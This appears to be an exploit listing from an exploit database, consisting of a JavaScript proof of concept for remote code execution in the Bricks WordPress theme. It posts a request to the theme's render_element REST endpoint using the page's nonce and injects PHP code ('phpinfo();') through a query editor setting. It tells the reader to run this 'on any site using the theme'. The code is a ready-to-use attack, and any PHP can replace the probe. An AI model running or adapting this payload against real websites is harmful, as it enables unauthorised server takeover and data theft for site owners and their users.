## https://sploitus.com/exploit?id=WPEX-ID:8BAB5266-7154-4B65-B5BC-07A91B28BE42
Run the following JS on any site using the theme:
```
await fetch("/wp-json/bricks/v1/render_element", {
"credentials": "include",
"headers": {
"Content-Type": "application/json"
},
"body": `{"nonce":"${bricksData['nonce']}","postId":1,"element":{"blah":1},"loopElement":{"settings":{"query":{"useQueryEditor":true,"queryEditor":"phpinfo();"}}}}`,
"method": "POST",
"mode": "cors"
});
```